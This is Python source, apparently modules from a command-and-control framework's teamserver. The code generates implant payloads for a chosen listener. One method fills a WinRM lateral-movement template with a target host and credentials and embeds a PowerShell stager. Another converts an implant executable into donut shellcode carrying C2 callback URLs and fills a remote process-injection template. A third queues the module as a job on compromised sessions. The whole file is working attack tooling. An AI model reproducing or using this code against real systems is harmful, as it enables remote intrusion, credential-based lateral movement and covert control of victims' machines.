def payload(self): stager = ipc_server.publish_event(events.GET_STAGERS, ('powershell', )) listener = ipc_server.publish_event( events.GET_LISTENERS, (self.options['Listener']['Value'], )) if stager and listener: stager.options['AsFunction']['Value'] = False with open('core/teamserver/modules/boo/src/winrm.boo', 'r') as module_src: guid, psk, stage = stager.generate(listener) ipc_server.publish_event(events.SESSION_REGISTER, (guid, psk)) src = module_src.read() src = src.replace('TARGET', self.options['Host']['Value']) src = src.replace('USERNAME', self.options['Username']['Value']) src = src.replace('DOMAIN', self.options['Domain']['Value']) src = src.replace('PASSWORD', self.options['Password']['Value']) src = src.replace( 'TRUSTED_HOSTS', str(self.options['AddToTrustedHosts']['Value']).lower()) src = src.replace('PAYLOAD', f'`{stage}`') return src print_bad('Invalid listener selected')
def payload(self): listener = ipc_server.publish_event( events.GET_LISTENERS, (self.options['Listener']['Value'], )) if listener: c2_urls = ','.join( filter(None, [ f"{listener.name}://{listener['BindIP']}:{listener['Port']}", listener['CallBackURls'] ])) guid = uuid.uuid4() psk = gen_stager_psk() ipc_server.publish_event(events.SESSION_REGISTER, (guid, psk)) donut_shellcode = donut.create( file='./core/teamserver/data/naga.exe', params=f"{guid};{psk};{c2_urls}", arch=2 if self.options['Architecture']['Value'] == 'x64' else 1) shellcode = shellcode_to_int_byte_array(donut_shellcode) #if self.options['InjectionMethod']['Value'] == 'InjectRemote': with open('core/teamserver/modules/boo/src/injectremote.boo', 'r') as module_src: src = module_src.read() src = src.replace('BYTES', shellcode) src = src.replace('PROCESS', self.options['Process']['Value']) return src else: print_bad( f"Listener '{self.options['Listener']['Value']}' not found!")
def run(self, guids): for guid in guids: ipc_server.publish_event(events.NEW_JOB, (guid, Job(module=self.selected)))